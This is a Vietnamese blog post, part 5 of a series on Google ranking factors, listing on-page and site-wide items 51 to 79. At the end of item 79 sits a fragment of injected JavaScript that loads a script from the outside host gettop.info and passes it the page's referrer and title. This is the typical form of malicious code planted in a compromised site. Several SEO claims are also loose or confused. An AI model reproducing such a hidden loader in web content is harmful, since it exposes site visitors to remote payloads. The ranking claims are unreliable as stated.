SEO chuẩn theo 200 yếu tố xếp hạng của Google phần 5

Kết thúc phần 4 dừng lại ở 50 yếu tố chuẩn về onpage thì phần 5 xem như được chờ đợi hơn cả là các yếu tố về backlink và tổng quát site Authory.

on-site-seo-factors

 

Quay ngược lại bài phần 4 SEO chuẩn 200 yếu tố xếp hạng Google để tham khảo thêm

51. Từ khóa có trong URL: Một yếu tố xem ra không quan trọng lắm. Nhưng theo mình đến khi nào Google còn in đậm các yếu tố trên xếp hạng tìm kiếm thì chắc chắn nó còn được ưu tiên.

 

52. Chuỗi URL: Được Google đọc và cung cấp như một tín hiệu của chuyên đề nào đó.

01_preview.__large_preview

 

53. Tài liệu tham khảo và các nguồn: Vấn đề này được bỏ qua và xem nhẹ tại Việt Nam. Google luôn chống lại các tài liệu copy nhưng có những tài liệu bắt buộc phải chép y nguyên như luật, văn, thơ… Vì vậy hãy để lại nguồn hoặc backlink cho tác giả một là tôn trọng tác giả, thứ 2 bạn sẽ không bị Google xử phạt lỗi sao chép. Google Adsense là trung tâm xét duyệt quảng cáo khá nghiêm ngặt của Google nhưng nó vẫn chấp nhận các bài viết hoặc trích từ báo và nêu rõ nguồn.

 

54. Danh sách dấu sao và đánh số thứ tự: Tất cả các trình soạn thảo từ Office đến trình soạn thảo trên các mã nguồn hiện nay đều hỗ trợ tình năng Bullets và Numbered list vậy nhưng nhiều khi chúng ta bỏ qua. Tôi thấy yếu tố này có vẻ không được chuẩn cho lắm nhưng để hướng đến người dùng một cách linh tốt nhất thì đây là tính năng tốt dành cho bạn.

 

55. Điểm của trang trong sitemap: Bây giờ hầu hết các sitemap được làm tự động nên việc cho điểm số ít người quan tâm. Đến những website có hàng nghìn, hàng triệu bài viết thì đây là điều không thể. Được áp dụng với các bạn làm Make money online với chiến lược Prolunch có lẽ sẽ hiệu quả bởi trang Prolunch thường chỉ có 3-5 bài viết và việc xếp hạng điểm chất lượng ưu tiên cho chúng trở nên vượt trội hơn.

 

56. Có quá nhiều liên kết ngoại: Tài liệu Google nói rằng bằng cách liên kết ra ngoài quá nhiều khiến người dùng mất tập trung vào nội dung chính và việc xếp hạng nội dung này cần được cân nhắc.

 

57. Chất lượng xếp hạng cho các từ khóa khác: Trường hợp này có thể tốt hoặc xấu, Google vấn hiển thị những từ khóa ngoài ý muốn của bạn thậm chí không phải nội dung chính trong bài viết mà nó liên quan đến một phần nào đó tại chuyên mục, bài viết liên quan trên website để hiển thị tối đa kết quả cho người truy vấn. Một yếu tố khá mờ nhạt và tôi cũng không thực sự hiểu.

 

58. Tuổi thọ của trang: Cũng như domain thì tuổi thọ của trang cũng ảnh hưởng đến việc xếp hạng, thường những trang tồn tại lâu được đánh giá cao hơn.

 

59. Giao diện thân thiện cho người dùng: Đơn giản, hữu ích là thứ mà Google hướng đến, còn bạn hãy tham khảo ý kiến của người dùng để có được phương án tối ưu nhất.

 

60. Parked Domains: Trong một cập nhật 12/2011 Google nhắc đến việc giảm hạng của những tên miền chưa sử dụng.

 

61. Nội dung hữu ích: Đây được xem như yếu tố quan trọng nhất cho cả SEO và người dùng. Bằng nhưng nghiên cứu về hành vi con người của Tâm lý học cũng như các yếu tố khác biệt mà Google có thể phân biệt được nội dung “chất lượng” và “hữu ích”. Gần như đa số kết quả trả về được xếp hạng cao đều làm chúng ta hài lòng về những gì chúng ta muốn tìm kiếm.

 

Yếu tố liên quan đến toàn bộ trang web (site)

 

Đến đây chúng ta phân biệt các định nghĩa:

Site: toàn bộ trang web bao gồm page (landing-page và home-page), domain.

Domain: Chỉ là tên miền của website

Page: Từng trang trong website

 

62. Nội dung độc đáo và cung cấp cái nhìn sâu sắc: Vnexpress là một ví dụ điển hình cho bạn.

 

63. Trang liên hệ: Thông thường tiếng anh là contact us, xem ra được đề cao. Không mất quá nhiều thời gian của bạn hãy thêm nó vào.

Theo như tài liệu Google thì một trang liên hệ có thông tin trùng khớp với Whois của bạn thì điểm chất lượng sẽ được đánh giá cao.

 

64. Domain trust hoặc TrustRank: Được áp đụng đầu tiên bởi Yahoo từ năm 2004 và đến nay tầm ảnh hưởng của TrustRank (độ tin cậy) càng được củng cố. Xếp hạng là một trong những yếu tố quan trọng nhất với SEO.

Các bạn có thể đọc thêm về cách tăng TrustRank cho website

 

65. Kiến trúc của website: Xin lỗi các bạn mình chưa tổng hợp được tài liệu và hoàn toàn không tương tác đến yếu tố này.

 

66. Cập nhật website: Cũng như một page, khi một website được làm tươi mới và cung cấp thêm nội dung đó là tính cập nhật của nó. Một page thường được cập nhật sẽ được chỉ số ưu tiên và một website thường được cập nhật thì toàn bộ các page được ưu tiên.

 

67. Số lượng trang của một website: Việc những trang web có số lượng trang ít hơn thể hiện sự yếu kém so với những trang web lớn.

 

68. Sự hiện diện của sitemap: Nhiều bài SEO khuyến cáo bạn nên đặt link sitemap ra ngoài website để người dùng và công cụ tìm kiếm tìm thấy nó. Một website cung cấp sitemap tốt là cách thức để nội dung được index nhanh, dễ dàng và chuyên sâu hơn.

 

69. Sự hoạt động liên tục của website: Có nhiều website mất rất nhiều thời gian bảo trì hoặc có vấn đề với máy chủ sẽ làm giảm hạng nghiêm trọng với website đó. Việc bạn bán hàng mà liên tục không mở cửa hàng thì dần dần khách hàng sẽ bỏ bạn và gây nên phản hồi không tốt về dịch vụ.

 

70.  Địa điểm đặt Sever: Một website của Việt Nam nên dùng các Sever Việt Nam để được ưu tiên SEO trong khu vực địa lý Việt Nam.

 

71. Chứng nhận SSL (Giấy phép thương mại điện tử): Các bạn làm thương mại điện tử chú ý đến cái này để chiếm được quyền ưu tiên trong SEO.

 

72. Trang điều khoản và chính sách: Không những chỉ cung cấp trang liên hệ mà một website tốt cần có trang điều khoản (terms) và chính sách (privacy). Hai trang này nói với Google rằng bạn là một thành viên đáng tin cậy của cộng đồng Internet.

 

73. Trùng lặp các thẻ meta thông tin trên website: Ví dụ đơn giản nếu bạn cung cấp đến Google 3 tên tác giả tại website. Nó chỉ ưu tiên quét thẻ Authorship đầu tiên nó nhận được và loại trừ những cái tiếp theo. Nếu cung cấp không đúng, trùng lặp quá nhiều có thể phá vỡ hiển thị trên Google tìm kiếm.

 

74. BreadCrumb – Liên kết bánh mỳ – Danh mục liên kết dạng bánh mỳ: Đây là một cấu trúc website khá thân thiện với người dùng, nó cho biết họ đang ở đâu và xem những mục nào. Hiện thời mã nguồn forum VBB và Xenforo đang làm rất tốt điều đó. Cá nhân tôi loại bỏ liên kết bánh mỳ này để ưu tiên hiển thị chuỗi URL trên Google tìm kiếm để được ưu tiên tuyệt đối về sự lặp lại của từ khóa. Bạn có thể chọn cách hiển thị liên kết bánh mỳ theo Richspinet.

 

breadcrumb_navigation

 

75. Tối ưu hóa cho mobile: Một xu hướng nổi lên và chắc chắn với thời đại SmartPhone mỗi ngày đẻ ra một chủng loại mới thì bản thân các chủ website và Google đều quan tâm đến việc này. Theo thống kê thì blog cá nhân của tôi có đến 50% lượng truy cập từ thiết bị di động cấp cao. Việc tối ưu hóa cho mobile sẽ ảnh hưởng lớn đến điểm chất lượng cho toàn website của bạn.

 

76. Youtube: Các bạn không thể phủ nhận rằng Youtube luôn chiếm thứ hạng đặc biết trên xếp hạng (có thể là nó thuộc sở hữu của Google nên ưu tiên).

Nếu bạn đang muốn SEO một video quảng bá sản phẩm nào đó hãy nghĩ đến Youtube hoặc tạo các liên kết từ Youtube về website của chính bạn.

youtube_serps

 

77. Tinh dễ sử dụng của website: Một yếu tố nổi bật đánh giá về chất lượng của một website là thời gian online trên website đó (time on site). Việc bạn tạo ra một trang khó sử dụng, khó chuyển hướng và điều hướng nội dung sẽ làm tổn hại đến thời gian khách online trên website của mình. Hãy cấu trúc một website dễ dùng và đặt bẫy liên kết nội dung ở những nơi mà người dùng chú ý đến nhất.

 

78. Sử dụng Google Analytics và Google Webmater: Điều này chắc không phải bàn cãi nữa rồi. Một là giúp bạn tương tác được với công cụ tìm kiếm để cùng xử lý thông tin với Google. Hai là bạn sẽ nhận được những gợi ý cải tiến website giúp bạn nâng cao thứ hạng. Một điều chắc chắn bạn phải làm nếu muốn SEO Google. Bạn có thể trực tiếp cải tiến thứ hạng của mình bằng cách cung cấp đến Google nhiều dữ liệu, đúng trọng tâm hơn những gì Google quét.

 

79. Đánh giá của người sử dụng và danh tiếng của website: Một website được đánh giá tốt trên Yelp.com hoặc Ripoffreport.com được xem như dấu hiệu quan trọng giúp nâng cao điểm chất lượng trên Google. Thực sự cách này mình chưa thử bao giờ và đặc biệt với nội dung Tiếng Việt thì mình nghĩ nó không cần thiết lắm.d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Pin It

Trả lời

Thư điện tử của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *